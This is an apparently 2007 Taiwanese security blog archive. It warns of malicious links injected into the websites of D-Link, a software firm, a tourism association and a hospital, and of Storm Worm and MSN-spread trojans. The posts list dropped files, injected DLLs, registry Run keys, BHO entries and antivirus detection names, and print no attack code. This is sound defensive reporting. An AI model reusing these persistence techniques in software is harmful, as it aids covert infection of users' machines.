十二月, 2007

D-Link(友訊科技)網站被植入惡意連結

2007 年 12 月 31 日 – 10:17:00

注意:最近此網站上有「星光幫演唱會來囉」的訊息,不曉得有多少網友因為這個訊息,瀏覽此網站而中獎勒!

D-Link(友訊科技)網站被植入惡意連結,此惡意程式為 TSPY_ONLINEG.ISZ/TSPY_GAMPASS.AK/TSPY_LEGMIR.CSF,最近有瀏覽這個網頁的網友,應該要盡速檢查自己的電腦,請各位暫時不要瀏覽這個網站,以免中毒。(Credit: 匿名網友)

惡意連結/程式碼是放置在首頁 (其他頁面可能要仔細檢查一下囉) 中的:

此惡意程式有一部分是利用RealPlayer的安全漏洞,詳細資訊,請參考 CVE-2007-5601

執行之後,有下面的行為:

[Added process]
C:\WINDOWS\system32\wszjdax.exe
C:\WINDOWS\system32\wsmseax.exe
C:\WINDOWS\system32\gjfhazc.exe
C:\WINDOWS\system32\kvdxlis.exe
C:\WINDOWS\system32\gjtmazc.exe
C:\WINDOWS\system32\kvdxslis.exe
C:\WINDOWS\system32\avwlhst.exe
C:\WINDOWS\system32\avwghst.exe
C:\WINDOWS\system32\avzxlst.exe
C:\WINDOWS\system32\kafykaz.exe
C:\WINDOWS\system32\kapjgaz.exe

[DLL injection]
C:\Documents and Settings\Administrator\Local Settings\Temp\LYMANGR.DLL
C:\WINDOWS\136741MM.DLL
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\avwghmn.dll
C:\WINDOWS\system32\avwlhmn.dll
C:\WINDOWS\system32\avzxlmn.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\gjfhayc.dll
C:\WINDOWS\system32\gjtmayc.dll
C:\WINDOWS\system32\kafykzy.dll
C:\WINDOWS\system32\kapjgzy.dll
C:\WINDOWS\system32\kvdxlma.dll
C:\WINDOWS\system32\kvdxslma.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\LotusHlp.dll
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\MsPrint32D.dll
C:\WINDOWS\system32\PTSShell.dll
C:\WINDOWS\system32\SSLDyn.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\wsmsezx.dll
C:\WINDOWS\system32\wszjdzx.dll

[Added service]
NAME: PciHardDisk
DISPLAY: PciHardDisk
FILE: \??\C:\WINDOWS\system32\fat32.sys

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temp\LYLOADER.EXE
C:\Documents and Settings\Administrator\Local Settings\Temp\LYMANGR.DLL
C:\Documents and Settings\Administrator\Local Settings\Temp\MSDEG32.DLL
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\111[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\13[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\18[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\1[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\22[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\3[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\5[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\r[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\10[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\1299644[1].js
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\16[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\20[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\24[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\4[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\7[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\Cip[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\dy[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\rl[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\11[1].js
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\14[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\19[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\1[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\23[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\6[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\9[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\new232[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\stat[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\014[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\0[1].js
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\11[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\17[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\21[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\25[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\2[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\8[1].exe
C:\WINDOWS\136741L.exe
C:\WINDOWS\136741M.exe
C:\WINDOWS\136741MM.DLL
C:\WINDOWS\136741WL.DLL
C:\WINDOWS\AVPSrv.exE
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\Fonts\ardaase.fon
C:\WINDOWS\Fonts\ardasbse.fon
C:\WINDOWS\Fonts\avwghinb.dll
C:\WINDOWS\Fonts\avwlhinb.dll
C:\WINDOWS\Fonts\avzxlin.dll
C:\WINDOWS\Fonts\enfeafx.fon
C:\WINDOWS\Fonts\enpobfx.fon
C:\WINDOWS\Fonts\gjfeaxw.fon
C:\WINDOWS\Fonts\gjfhass.dll
C:\WINDOWS\Fonts\gjtmass.dll
C:\WINDOWS\Fonts\gjtoaxw.fon
C:\WINDOWS\Fonts\kafykcsb.dll
C:\WINDOWS\Fonts\kapjgcsb.dll
C:\WINDOWS\Fonts\kvdxlcfb.dll
C:\WINDOWS\Font
s\kvdxslcfb.dll
C:\WINDOWS\Fonts\msguasd.fon
C:\WINDOWS\Fonts\mswuasd.fon
C:\WINDOWS\Fonts\mszhasd.fon
C:\WINDOWS\Fonts\wsmsecjb.dll
C:\WINDOWS\Fonts\wszjdcj.dll
C:\WINDOWS\Fonts\wymoafz.fon
C:\WINDOWS\Fonts\wyzuafz.fon
C:\WINDOWS\Kvsc3.exE
C:\WINDOWS\LotusHlp.exe
C:\WINDOWS\MsIMMs32.exE
C:\WINDOWS\MsPrint32D.exe
C:\WINDOWS\PTSShell.exe
C:\WINDOWS\SSLDyn.exE
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\avwghmn.dll
C:\WINDOWS\system32\avwghst.exe
C:\WINDOWS\system32\avwlhmn.dll
C:\WINDOWS\system32\avwlhst.exe
C:\WINDOWS\system32\avzxlmn.dll
C:\WINDOWS\system32\avzxlst.exe
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\config\sysEventw.cfg
C:\WINDOWS\system32\gjfhayc.dll
C:\WINDOWS\system32\gjfhazc.exe
C:\WINDOWS\system32\gjtmayc.dll
C:\WINDOWS\system32\gjtmazc.exe
C:\WINDOWS\system32\kafykaz.exe
C:\WINDOWS\system32\kafykzy.dll
C:\WINDOWS\system32\kapjgaz.exe
C:\WINDOWS\system32\kapjgzy.dll
C:\WINDOWS\system32\kvdxlis.exe
C:\WINDOWS\system32\kvdxlma.dll
C:\WINDOWS\system32\kvdxslis.exe
C:\WINDOWS\system32\kvdxslma.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\LotusHlp.dll
C:\WINDOWS\system32\LYLOADER.EXE
C:\WINDOWS\system32\LYMANGR.DLL
C:\WINDOWS\system32\MSDEG32.DLL
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\MsPrint32D.dll
C:\WINDOWS\system32\PTSShell.dll
C:\WINDOWS\system32\REGKEY.hiv
C:\WINDOWS\system32\SSLDyn.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\wsmseax.exe
C:\WINDOWS\system32\wsmsezx.dll
C:\WINDOWS\system32\wszjdax.exe
C:\WINDOWS\system32\wszjdzx.dll
C:\WINDOWS\system32\wxptdi.sys
C:\WINDOWS\upxdnd.exe

[Added COM/BHO]
{1C098A56-F90F-A789-901F-8906546720C1}-C:\WINDOWS\system32\gjtmayc.dll
{1D908534-AD45-920F-AC89-4024FA9D26D1}-C:\WINDOWS\system32\gjfhayc.dll
{45679330-4034-9021-7012-909856721374}-C:\WINDOWS\system32\wszjdzx.dll
{792FADFA-BCDE-ACDF-CDEF-21054865CBA7}-C:\WINDOWS\system32\wsmsezx.dll
{7A321487-4977-D98A-C8D5-6488257545A7}-C:\WINDOWS\system32\kapjgzy.dll
{8960356A-458E-DE24-BD50-268F589A56A8}-C:\WINDOWS\system32\avwlhmn.dll
{8A1247C1-53DA-FF43-ABD3-345F323A48D8}-C:\WINDOWS\system32\avwghmn.dll
{BB681598-AD5F-BC8C-77DC-748FAC8D3FBB}-C:\WINDOWS\system32\kafykzy.dll
{C859245F-345D-BC13-AC4F-145D47DA34FC}-C:\WINDOWS\system32\avzxlmn.dll
{CC87A354-ABC3-DEDE-FF33-3213FD7447CC}-C:\WINDOWS\system32\kvdxlma.dll
{CD561258-45F3-A451-F908-A258458226DC}-C:\WINDOWS\system32\kvdxslma.dll

[Added registry]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=SSLDyn
Data=C:\WINDOWS\SSLDyn.exE

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=upxdnd
Data=C:\WINDOWS\upxdnd.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=AVPSrv
Data=C:\WINDOWS\AVPSrv.exE

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=cmdbcs
Data=C:\WINDOWS\cmdbcs.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=WinSysM
Data=C:\WINDOWS\136741M.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=WinSysW
Data=C:\WINDOWS\136741L.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=Kvsc3
Data=C:\WINDOWS\Kvsc3.exE

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=MsPrint32D
Data=C:\WINDOWS\MsPrint32D.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=PTSShell
Data=C:\WINDOWS\PTSShell.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=LotusHlp
Data=C:\WINDOWS\LotusHlp.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=MsIMMs32
Data=C:\WINDOWS\MsIMMs32.exE

到目前為止 (2007/12/31 @ 10:39),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):

稍後更新…

惡意程式, 網站安全 | 瀏覽數:271 | 3 迴響 »

風暴蠕蟲新變種報到

2007 年 12 月 28 日 – 10:25:00

不到一天的時間,風暴蠕蟲的作者又改變惡意檔案下載網域名稱,繼續散播新變種的風暴蠕蟲,請各位小心。

郵件名稱 (Subject) 有下面幾種:

A fresh new year
As the new year…
As you embrace another new year
Blasting new year
Happy 2008!
Happy New Year!
It’s the new Year
Joyous new year
New Hope and New Beginnings
New Year Ecard
New Year Postcard
Opportunities for the new year
Wishes for the new year
Happy New Year to You!
Happy New Year to
Lots of greetings on the new year
New Year wishes for You
Dance to the New 2008 Year tune

執行之後,有下面的行為 (具有隱匿行為):

[Added service]
NAME: bldy1b60-7eb3
DISPLAY: bldy1b60-7eb3
FILE: \??\C:\WINDOWS\system32\bldy1b60-7eb3.sys

[Added file]
C:\Documents and Settings\Administrator\Desktop\happy-2008.exe
C:\WINDOWS\system32\bldy1b60-7eb3.sys
C:\WINDOWS\system32\bldy_sys.config

到目前為止 (2007/12/27 @ 22:02),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):

bldy_sys.config:
[ Microsoft ], “Backdoor:Win32/Nuwar.B!ini”
happy-2008.exe:
[ Symantec ], “Trojan.Peacomm”
[ McAfee ], “W32/Nuwar@MM”
[ McAfee_Beta ], “W32/Nuwar@MM”
[ Sophos ], “Mal/Dorf-H”
[ Panda_Beta ], “W32/Nuwar.MS.worm”
[ Nod32 ], “Win32/Nuwar.BA worm”
[ Fortinet ], “W32/Tibs.G@mm”
[ HBEDV ], “TR/Crypt.XDR.Gen”
[ Authentium ], “W32/Dropper.gen6″
[ WebWasher ], “Trojan.Crypt.XDR.Gen”
bldy1b60-7eb3.sys:
[ Microsoft ], “Backdoor:WinNT/Nuwar.B!sys”
[ McAfee ], “Downloader-BAI.sys.gen.a”
[ McAfee_Beta ], “Downloader-BAI.sys.gen.a”
[ CAV ], “Win32/Sintun!generic”
[ Nod32 ], “Win32/Nuwar.BA worm”
[ HBEDV ], “TR/Rootkit.Gen”
[ quickheal ], “Backdoor.Agent.dln”
[ WebWasher ], “Trojan.Rootkit.Gen”

垃圾郵件, 惡意程式 | 瀏覽數:472 | 1 迴響 »

新年快樂病毒報到

2007 年 12 月 26 日 – 15:42:00

最近信箱收到一些垃圾郵件是有關新年快樂的訊息,但此信件中包含可下載風暴蠕蟲 (Storm Worm) 的連結,下載檔案名稱為 happy-2008.exe,可見此病毒的作者又開始利用「放年假的心態」,以散播新變種的風暴蠕蟲,請各位小心囉。

執行之後,有下面的行為 (具有隱匿行為):

[Added service]
NAME: init_1c52-26ff
DISPLAY: init_1c52-26ff
FILE: \??\C:\WINDOWS\system32\init_1c52-26ff.sys (random file name)

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\happy-2008[1].exe
C:\WINDOWS\system32\init_1c52-26ff.sys

到目前為止 (2007/12/26 @ 14:41),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):

init_1c52-26ff.sys:
[ Microsoft ], “Backdoor:WinNT/Nuwar.B!sys”
[ McAfee ], “Downloader-BAI.sys.gen.a”
[ McAfee_Beta ], “Downloader-BAI.sys.gen.a”
[ Alwil ], “Win32:Zhelatin-ASX [Wrm]“
[ Nod32 ], “probably a variant of Win32/Fuclip trojan”
[ HBEDV ], “TR/Rootkit.Gen”
[ Ikarus ], “Backdoor.Win32.Agent.amd”
[ WebWasher ], “Trojan.Rootkit.Gen”
init_sys_config:
[ Microsoft ], “Backdoor:Win32/Nuwar.B!ini”
[ Sophos ], “Troj/Dorfin-Fam”
happy-2008[1].exe:
[ Microsoft ], “Backdoor:WinNT/Nuwar.B!sys”
[ McAfee ], “W32/Nuwar@MM”
[ McAfee_Beta ], “W32/Nuwar@MM”
[ Alwil ], “Win32:Zhelatin-ASX [Wrm]“
[ Nod32 ], “probably a variant of Win32/Fuclip trojan”
[ HBEDV ], “TR/Rootkit.Gen”
[ Authentium ], “W32/StormWorm.Q”
[ WebWasher ], “Trojan.Rootkit.Gen”
[ bitdefender ], “DeepScan:Generic.Malware.FMH@mmign.893777D0″

垃圾郵件, 惡意程式 | 瀏覽數:456 | 0 迴響 »

聖誕節MSN病毒

2007 年 12 月 26 日 – 13:14:00

昨天收到從一個朋友的MSN傳送過來的一個樣本,名為「christmas-2007.zip」,壓縮檔中包含一個名為 「img2007-12.JPEG.scr」的檔案,分析後,它具有惡意行為,請各位小心囉。

執行之後,有下面的行為:

[Added process]
C:\WINDOWS\servidevice.exe

[Added file]
C:\WINDOWS\Chirstmas-2007.zip
C:\WINDOWS\servidevice.exe

[Added registry]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value=ryan1918
Data=servidevice.exe

到目前為止 (2007/12/25 @ 13:58),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):

Chirstmas-2007.zip/img2007-12.JPEG.scr:
[ Nod32 ], “Win32/IRCBot.ABP trojan”
[ Fortinet ], “suspicious”
[ Rising ], “Backdoor.Win32.PBot.b”
[ Ikarus ], “Trojan-Downloader.Win32.Banload.ams”
[ Authentium ], “W32/Document-disguised-based!Maximus”
[ WebWasher ], “BlockReason.46 (suspicious)”
servidevice.exe:
[ Nod32 ], “Win32/IRCBot.ABP trojan”
[ Fortinet ], “suspicious”
[ Rising ], “Backdoor.Win32.PBot.b”
[ Ikarus ], “Trojan-Downloader.Win32.Banload.ams”
[ Authentium ], “W32/Document-disguised-based!Maximus”
[ WebWasher ], “BlockReason.46 (suspicious)”

即時通訊, 惡意程式 | 瀏覽數:473 | 0 迴響 »

北軟股份有限公司網站被植入惡意連結

2007 年 12 月 26 日 – 10:25:00

注意:此惡意連結已經存在該公司網頁很多天了,都不見他們處理,想必有很多人中獎。

北軟股份有限公司網站被植入惡意連結,此惡意程式為 TROJ_SMALL.DXW,最近有瀏覽這個網頁的網友,應該要盡速檢查自己的電腦,請各位暫時不要瀏覽這個網站,以免中毒。(Credit: 匿名網友)

惡意連結/程式碼是放置在首頁 (其他頁面也有,可能要仔細檢查一下囉) 中的:

此惡意程式是利用RealPlayer的安全漏洞,詳細資訊,請參考 CVE-2007-5601

到目前為止 (2007/12/24 @ 16:24),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):

6.gif:
[ Trend ], “JS_REALPLAY.J”
ads.jpg.exe:
[ Trend ], “TROJ_SMALL.DXW”
web.exe:
[ Trend ], “TROJ_ALMANAHE.AC”
1.gif:
[ Trend ], “JS_AGENT.AEVS”

惡意程式, 網站安全 | 瀏覽數:303 | 1 迴響 »

高雄市觀光協會網站被植入惡意連結

2007 年 12 月 12 日 – 17:33:00

高雄市觀光協會網站被植入惡意連結,此惡意程式為 PWS:Win32/Gamania.gen!B,最近有瀏覽這個網頁的網友,應該要盡速檢查自己的電腦,請各位暫時不要瀏覽這個網站,以免中毒。

惡意連結/程式碼是放置在首頁和 index-down.asp (其他頁面可能要仔細檢查一下囉) 中的:

執行之後,有下面的行為:

[DLL injection]
C:\WINDOWS\Help\9712499B91DB.DLL

[Added file]
C:\autorun.inf
C:\Documents and Settings\Administrator\Desktop\2.bat
C:\Documents and Settings\Administrator\Local Settings\Temp\~s.bat
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\m[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\OXI7BCE5\gmsex[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\h[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\stat[1].htm
C:\shell.exe
C:\WINDOWS\Help\9712499B91DB.DLL
C:\WINDOWS\Help\9712499B91DB.EXE
C:\WINDOWS\Help\autorun.inf

[ Added COM/BHO ]
{6B12A5F5-CABF-41EE-B8B3-EC5D2AAFF132}-C:\WINDOWS\HELP\9712499B91DB.DLL

到目前為止 (2007/12/12 @ 16:04),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):

9712499B91DB.DLL:
[ Trend ], “Possible_Infostl”
9712499B91DB.EXE:
[ IntelliTrap ], “PAK_Generic.001″
[ Alpha_Gen ], “Possible_Mlwr-13″
[ Microsoft ], “PWS:Win32/Gamania.gen!B”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, [FILE:0001]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “probably a variant of Win32/Genetik trojan”
[ HBEDV ], “DR/Delphi.Gen”
[ Norman ], “[Heuristic Sandbox detection]:Virus W32/Malware”
[ eAladdin ], “Suspicious File [100]“
[ vba32 ], “MalwareScope.Trojan-PSW.Game.14″
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.Dropper.Delphi.Gen”
autorun.inf:
[ Beta_Gen ], “Possible_Otorun1″
[ Ikarus ], “Trojan-PWS.OnlineGames.NIT”
[ bitdefender ], “Trojan.PWS.OnLineGames.NIT”
gmsex[1].exe:
[ IntelliTrap ], “PAK_Generic.001″
[ Alpha_Gen ], “Possible_Mlwr-13″
[ Microsoft ], “PWS:Win32/Gamania.gen!B”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, [FILE:0001]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “probably a variant of Win32/Genetik trojan”
[ HBEDV ], “DR/Delphi.Gen”
[ Norman ], “[Heuristic Sandbox detection]:Virus W32/Malware”
[ eAladdin ], “Suspicious File [100]“
[ vba32 ], “MalwareScope.Trojan-PSW.Game.14″
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.Dropper.Delphi.Gen”
h[1].htm:
[ Alpha_Gen ], “Heur_Infrm-1″
[ Sophos ], “Mal/Iframe-A”
[ HBEDV ], “HEUR/Exploit.HTML”
[ Norman ], “Trojan HTML/Exploit!IFrame.G”
m[1].htm:
[ McAfee ], “Exploit-ObscuredHtml”
[ McAfee_Beta ], “Exploit-ObscuredHtml”
[ HBEDV ], “HTML/ADODB.Exploit.Gen”
[ Grisoft ], “Virus found JS/Downloader.Agent”
[ WebWasher ], “Script.ADODB.Exploit.Gen”
shell.exe:
[ IntelliTrap ], “PAK_Generic.001″
[ Alpha_Gen ], “Possible_Mlwr-13″
[ Microsoft ], “PWS:Win32/Gamania.gen!B”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, [FILE:0001]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “probably a variant of Win32/Genetik trojan”
[ HBEDV ], “DR/Delphi.Gen”
[ Norman ], “[Heuristic Sandbox detection]:Virus W32/Malware”
[ eAladdin ], “Suspicious File [100]“
[ vba32 ], “MalwareScope.Trojan-PSW.Game.14″
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.Dropper.Delphi.Gen”

惡意程式, 網站安全 | 瀏覽數:505 | 2 迴響 »

台安醫院網站又被植入惡意連結

2007 年 12 月 12 日 – 16:23:00

注意:此網站被植入惡意連結的時間已經很久了,都不見他們有改善的情形,如果各位還上此網站的話,後果自行負責。

台安醫院網站又被植入惡意連結,此惡意程式為 Trojan W32/Lineage.AYTD,最近有瀏覽這個網頁的網友,應該要盡速檢查自己的電腦,請各位暫時不要瀏覽這個網站,以免中毒。

惡意連結/程式碼是放置在首頁 (其他頁面可能要仔細檢查一下囉) 中的:

執行之後,有下面的行為:

[DLL injection]
C:\WINDOWS\Web\printers\images\ndmai.dll

[Added file]
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C13NVBMZ\717[1].c
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\Q08VKCK4\h[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\614003[1].htm
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\614woai[1].exe
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\SEUIMLSE\717003[1].htm
C:\microsofts.vbs
C:\NTDETECT.EXE
C:\WINDOWS\Web\printers\images\ndmai.dll
C:\WINDOWS\Web\printers\images\ndmai.exe

[Added COM/BHO]
{7152C68A-D93C-49BF-AFEF-6B4576849A7E}-C:\WINDOWS\Web\printers\images\ndmai.dll

到目前為止 (2007/12/12 @ 12:38),下面的防毒軟體可以偵測到這些惡意檔案 (僅提供參考):

717[1].c:
[ Trend ], “EXPL_ANICMOO.GEN”
ndmai.dll:
[ Trend ], “Possible_Infostl”
ndmai.dll:
[ Trend ], “Possible_Infostl”
614woai[1].exe:
[ IntelliTrap ], “PAK_Generic.001″
[ Alpha_Gen ], “Possible_Mlwr-13″
[ Symantec ], “Infostealer.Lineage”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “a variant of Win32/PSW.Lineage.ACN trojan”
[ HBEDV ], “TR/PSW.Lineage.UZH”
[ Norman ], “Trojan W32/Lineage.AYTD”
[ Grisoft ], “Trojan horse PSW.Lineage.AFS”
[ eAladdin ], “Suspicious File [100]“
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.PSW.Lineage.UZH”
614003[1].htm:
[ McAfee ], “Exploit-ObscuredHtml”
[ McAfee_Beta ], “Exploit-ObscuredHtml”
[ HBEDV ], “HEUR/Exploit.HTML”
[ Grisoft ], “Virus found JS/Downloader.Agent”
h[1].htm:
[ McAfee ], “ObfuscatedHtml”
[ McAfee_Beta ], “ObfuscatedHtml”
[ WebWasher ], “BlockReason.46 (suspicious)”
microsofts.vbs:
[ Microsoft ], “[->(UTF-16LE)]:Virus:VBS/VBSWGbased.gen”
ndmai.exe:
[ IntelliTrap ], “PAK_Generic.001″
[ Alpha_Gen ], “Possible_Mlwr-13″
[ Symantec ], “Infostealer.Lineage”
[ Kaspersky ], “PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact, PAK:PE_Patch.MaskPE”
[ Sophos ], “[FILE:0000]:Mal/LineDLL-B, Mal/EncPk-AP”
[ Nod32 ], “a variant of Win32/PSW.Lineage.ACN trojan”
[ HBEDV ], “TR/PSW.Lineage.UZH”
[ Norman ], “Trojan W32/Lineage.AYTD”
[ Grisoft ], “Trojan horse PSW.Lineage.AFS”
[ eAladdin ], “Suspicious File [100]“
[ Sunbelt ], “VIPRE.Suspicious”
[ WebWasher ], “Trojan.PSW.Lineage.UZH”
NTDETECT.EXE:
[ Microsoft ], “[->(UTF-16LE)]:Virus:VBS/VBSWGbased.gen”

惡意程式, 網站安全 | 瀏覽數:297 | 1 迴響 »

大砲開講 is proudly powered by WordPress Entries (RSS) and Comments (RSS).